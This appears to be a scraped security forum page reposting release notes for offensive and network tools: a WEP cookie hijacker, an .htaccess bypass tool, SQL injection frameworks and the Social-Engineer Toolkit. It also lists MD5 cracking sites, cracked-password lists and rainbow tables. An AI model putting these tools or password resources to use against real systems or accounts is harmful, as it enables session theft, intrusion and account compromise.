Fern Wifi Cracker 1.45 Released with Cookie Hijacker Fern Cookie Hijacker is a new feature added in Fern Wifi Cracker 1.45. It is a wifi-based session hijacking tool able to clone remote online web sessions by sniffing and capturing wireless cookie packets from remote hosts by intercepting reachable wireless signals. It is capable of decrypting WEP encrypted packets on the fly to process session cookies transmitted over the air. Fern Cookie Hijacker comes with smart integrated code to detect and intercept cookie packets; unlike some cookie detection engines, Fern Cookie Hijacker does not wait to collect the complete cookie acknowledgement during the initial authentication process, but pulls cookies and associates them with their hosts as they are transmitted over the wireless connection. It also forges, for correctness, values that are not captured, e.g. (expiry, isSecure). Download Fern Wifi Cracker 1.45 Source: Fern Wifi Cracker 1.45 Released with Cookie Hijacker | Tools Yard - The Hacker News
-
HTExploit : Open Source Tool to Bypass Standard Directory Protection HTExploit (HiperText access Exploit) is an open-source tool written in Python that exploits a weakness in the way that .htaccess files can be configured to protect a web directory with an authentication process, to gain access to a protected directory's contents. Presumably, if such an attack is successful, you can launch further attacks such as SQL Injection, Local File Inclusion, Remote File Inclusion, etc. on discovered files. Features of HTExploit: Multiple modules to execute. Save the output to a specified directory. HTML reporting. Use multiple wordlists to probe against htaccess bypassing. Verbose mode for fully detailed information. Multi-platform and flexible. The vulnerability exists because web servers like Apache forward PHP-based requests within .htaccess to the PHP engine itself. The .htaccess file allows you to specify which requests get sent to PHP to try to interpret. However, on encountering non-standard input, PHP automatically treats it as a GET request, and allows the utility to start saving the PHP files on a webserver to your local filesystem, bypassing security restrictions! Download HTExploit Source: HTExploit : Open Source Tool to Bypass Standard Directory Protection | Tools Yard - The Hacker News
-
jSQL : Java GUI for database Injection An easy to use SQL injection tool for retrieving database information from a distant server. jSQL Injection features: GET, POST, header, cookie methods; visual, error-based, blind algorithms; automatic best algorithm detection; data retrieval progression; proxy setting. Download jSQL Source: jSQL : Java GUI for database Injection | Tools Yard - The Hacker News
-
Biggest MD5 crack databases By Langy
-----------------------------------------------------------------
BIGGEST SITES FOR MD5 DECRYPTION
-----------------------------------------------------------------
- Free Hash Cracker Online - MD5 Encrypt - MD5 Decrypt (40,000,000)
- online md5 cracker,md5 reverse, md5 decrypt (457,354,352,282)
- md5Crack.com | online md5 cracker
- http://www.hashchecker.com
- http://md5cracker.tk/ (MD5 search engine that searches a total of 14 on-line crackers.)
- MD5 Decrypter.com, MD5 Decryption, Free MD5 Decrypter (5,889,729)
- md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com (56,502,235)
- http://www.tmto.org/?category=main&page=search_md5 (306.000.000.000)
- http://www.milw0rm.com/cracker/insert.php (Milw0rm Cracker db)
- http://blacklight.gotdns.org/cracker/crack.php (2,456,288)
- http://www.shell-storm.org/md5 (The database currently contains 169582 passwords)
- Parallels Confixx (Need Account)
- http://passcracking.com/ (Register to increase your priority)
- http://www.xmd5.org
- Perl Script: MD5 Brute Forcer
-----------------------------------------------------------------
CRACKED PASSWORD LIST
-----------------------------------------------------------------
http://www.md5oogle.com/md5hashes.php
http://www.hashchecker.com/?_sls=hash_list&_from=1
http://www.milw0rm.com/cracker/list.php
http://darkc0de.com/database/cracked.txt
-----------------------------------------------------------------
RAINBOW TABLE
-----------------------------------------------------------------
http://www.freerainbowtables.com/en/download/
http://www.rainbowtables.net/
+++++++++++++++++++++++++++++++++++++++++++++++++++
http://gdataonline.com/seekhash.php
http://passcracking.com/
http://www.1hacker.com/md5/index.php
http://www.gdataonline.com/seekhash.php
http://www.rc.plain-text.info/
http://www.milw0rm.com/md5/index.php
http://www.cracking.com/Good_values_list.asp
http://www.passcracking.com/Good_values_list.asp
http://www.hashchecker.com/index.php?_sls=info
http://www.uploadpage.net/ap/php/pro...rt/addhash.php
http://www.cmho.tk/
http://www.md5.rednoize.com/
http://www.us.md5.crysm.net/
http://www.milw0rm.com
http://www.passcracking.com/
http://www.hashchecker.com/
http://www.plain-text.info
http://www.md5.rednoize.com
http://www.ice.breaker.free.fr
http://www.md5.shalla.de
http://www.nz.md5.crysm.net
http://www.shm.hard-core.pl/md5/
http://www.lasecwww.epfl.ch/%7Eoechs...ects/ophcrack/
http://www.md5.benramsey.com
Source: http://www.googlebig.com/forum/biggest-md5-crack-databases-t-68.html
-
Rather than posting a lot and badly, it is preferable not to post at all.
-
I have added an "Activity" button to the RST theme. If there is any problem, post here.
-
BBQSQL : Blind SQL injection framework ( Python ) Blind SQL injection can be a pain to exploit. When the available tools work, they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues. BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard-to-trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast. You must provide the usual information: URL, HTTP Method, Headers, Cookies, Encoding methods, Redirect behavior, Files, HTTP Auth, Proxies. After you pull the tool from Github, you can install it simply by typing: python setup.py install Download BBQSQL Source: BBQSQL : Blind SQL injection framework ( Python ) | Tools Yard - The Hacker News
-
The Social-Engineer Toolkit (SET) v3.5.1 released The Social-Engineer Toolkit (SET) v3.5.1 has been released. This version adds the ability to use the SET config to not deploy binaries to the victim machine through the Java Applet. The new configuration option can be found under config/set_config and DEPLOY_BINARIES. The Social Engineering Toolkit (SET) is an open source, python-driven, social-engineering penetration testing framework of custom tools which solely focuses on attacking the human element of penetration testing. It was designed in order to arm penetration testers and security researchers with the ability to effectively test heavily advanced social-engineering attacks armed with logical methods. The Social Engineer Toolkit leverages multiple attack vectors that take advantage of the human element of security in an effort to target attackers. By turning this off, SET will rely solely on the POWERSHELL_INJECTION technique for compromising the victim machine. This means that you have the ability to never touch disk, period, during the Java Applet attack. Full changelog below: Fixed a bug in command center that would cause it to not load properly. Fixed a bug in the new Java Applet Field Bytecode that would cause it to not properly select the payload. Added compatibility for IE10 on the Java Applet Attack Vector. Turned AUTO_MIGRATE=OFF to AUTO_MIGRATE=ON by default, allows sticky processes to free up when exploitation occurs. Added a new config option DEPLOY_BINARIES. When this is turned OFF, the Java Applet will only use the POWERSHELL_INJECTION technique and never deploy a binary. Note that you must know if the victim has POWERSHELL installed. Fixed a couple of typos in the credential harvester. In addition, AUTO_MIGRATE=ON has been turned on by default and will automatically migrate to a different thread/process. In IE10, IE would freeze periodically, causing issues. Even though the JVM is running in a separate thread pool, it would still cause freezing intermittently. The SET Command Center (web interface) had a bug fix to allow it to work properly. Download Social Engineer Toolkit 3.5.1 svn co / - Revision 1467: /social_engineering_toolkit set/ Source: The Social-Engineer Toolkit (SET) v3.5.1 released | Tools Yard - The Hacker News
-
The OWASP O2 Platform v 4.1 Released The OWASP O2 Platform is an OWASP Project which is a collection of Open Source modules that help Web Application Security Professionals to maximize their efforts and quickly obtain high visibility into an application's security profile. The objective is to "Automate Application Security Knowledge and Workflows". Read More here Download The OWASP O2 Platform v 4.1 Source: The OWASP O2 Platform v 4.1 Released | Tools Yard - The Hacker News
-
Freenet 0.7.5 build 1409 released Freenet is free software which lets you publish and obtain information on the Internet without fear of censorship. To achieve this freedom, the network is entirely decentralized, and publishers and consumers of information are anonymous. Without anonymity there can never be true freedom of speech, and without decentralization the network would be vulnerable to attack. Download Freenet 0.7.5 build 1409 Source: Freenet 0.7.5 build 1409 released | Tools Yard - The Hacker News
-
Network Tracking Database v1.10.2 released NetDB tracks all MAC addresses on your switches and ARP entries on your network over time. It supports extensive switch, VLAN and vendor code reports from a CLI or Web App. It can generate CSV reports, track the usage of static addresses and much more. What's new in v1.10.2: - See the UPGRADE document before installing - Added dedicated NX-OS scraper, devtype nxos. Improved NX-OS support for descriptions. The old scraper still supports NX-OS, but support will be dropped in v1.11 in favor of the nxosscraper. - Ability to configure use_trunks from the devicelist.csv file - Improved secondary credential support and login error messages - Added use_fqdn knob in netdb.conf to use the FQDN for switch names instead of just hostnames (changing this on an existing database will destroy historical data on switches because the names will all change) Major Features: Track all entries in your MAC and ARP tables across your network routers and switches over time. Track the usage of static IP addresses and generate reports for static address recovery. Generate switch reports to recover unused ports or plan for network upgrades. Find all switchports configured for a VLAN and find what devices, if any, have been connected. Find all devices on a VLAN and the last time they were online. Quickly track down a problem with a device and locate its current state on the network or last connected state. Includes a command line tool and an easy to use web interface with access control. Web interface includes sortable columns and access controls. Generate CSV reports from the web interface or the command line. Change VLANs from the web interface with access controls on a per switch or per user basis. Send Wake On Lan packets from the Web Interface to remotely wake up workstations. Fast imports, pulls data from 1,000 or more network devices in under five minutes (depends on the hardware used). Support for VRFs and almost every modern Cisco IOS and NX-OS device. Support for port security, port-channels and trunk ports for VMWare and phones. Optional graphing through MRTG to track the usage trends on your network. Optionally integrate NAC registration data to retrieve user registration information based on the MAC address. Security: Runs everything as the netdb user. Uses SSH and/or Telnet to gather information from your devices and does not require write access. Does not use SNMP, so no security issues or MIBs to deal with. Web Interface has access controls to restrict the information users can access based on their userid. Web Interface is hardened. Download Network Tracking Database v1.10.2 Source: Network Tracking Database v1.10.2 released | Tools Yard - The Hacker News
-
Ostinato : Packet/Traffic Generator and Analyzer Ostinato is an open-source, cross-platform network packet crafter/traffic generator and analyzer with a friendly GUI. Craft and send packets of several streams with different protocols at different rates. Windows, Linux, BSD and Mac OS X (will probably run on other platforms also with little or no modification, but this hasn't been tested). Open, edit, replay and save PCAP files. Support for the most common standard protocols: Ethernet/802.3/LLC SNAP; VLAN (with QinQ); ARP, IPv4, IPv6, IP-in-IP a.k.a. IP Tunnelling (6over4, 4over6, 4over4, 6over6); TCP, UDP, ICMPv4, ICMPv6, IGMP, MLD; any text based protocol (HTTP, SIP, RTSP, NNTP etc.); more protocols in the works. Modify any field of any protocol (some protocols allow changing packet fields with every packet at run time, e.g. changing IP/MAC addresses). User provided hex dump: specify some or all bytes in a packet. User defined script to substitute for an unimplemented protocol (EXPERIMENTAL). Stack protocols in any arbitrary order. Create and configure multiple streams. Configure stream rates, bursts, no. of packets. A single client can control and configure multiple ports on multiple computers generating traffic. Exclusive control of a port to prevent the OS from sending stray packets provides a controlled testing environment. Statistics window shows realtime port receive/transmit statistics and rates. Capture packets and view them (needs Wireshark to view the captured packets). Framework to add new protocol builders easily. Demo Download Ostinato Source: Ostinato : Packet/Traffic Generator and Analyzer | Tools Yard - The Hacker News